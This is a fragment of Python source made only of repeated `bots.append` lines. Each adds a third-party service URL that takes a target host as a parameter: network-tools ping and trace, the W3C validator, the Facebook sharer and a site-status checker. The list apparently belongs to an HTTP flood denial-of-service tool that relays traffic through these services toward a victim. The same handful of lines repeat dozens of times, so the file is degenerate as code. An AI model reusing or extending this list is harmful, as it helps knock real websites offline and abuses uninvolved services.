bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
